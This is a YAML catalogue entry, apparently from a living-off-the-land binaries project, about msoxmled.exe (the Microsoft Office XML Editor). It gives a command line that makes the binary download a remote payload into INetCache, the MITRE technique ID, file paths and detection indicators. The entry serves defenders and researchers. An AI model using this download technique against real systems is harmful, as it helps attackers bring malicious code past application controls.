Files
bogackayaandGitHub f06df108ee Update Msoxmled.yml (#512)
Fix handle for Furkan Celik in Msoxmled.yml
2026-06-16 19:35:36 +01:00

30 lines
1.2 KiB
YAML

---
Name: msoxmled.exe
Description: Microsoft Office XML Editor, used to handle XML documents in Microsoft Office.
Author: Bogac Kaya
Created: 2025-08-22
Commands:
- Command: msoxmled.exe /verb open {REMOTEURL}
Description: Downloads payload from remote server using the Microsoft Office XML Editor.
Usecase: It will download a remote payload and place it in INetCache.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\msoxmled.exe
- Path: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\msoxmled.exe
Detection:
- IOC: "`msoxmled.exe` making network connections to external URLs"
- IOC: Unexpected file downloads initiated by `msoxmled.exe`
- IOC: "Event ID 1 with Image: `msoxmled.exe` and CommandLine: `/verb open`"
Resources:
- Link: https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013
Acknowledgement:
- Person: Bogac Kaya
Handle: '@bogackayaa'
- Person: Furkan Celik
Handle: '@frknclk034'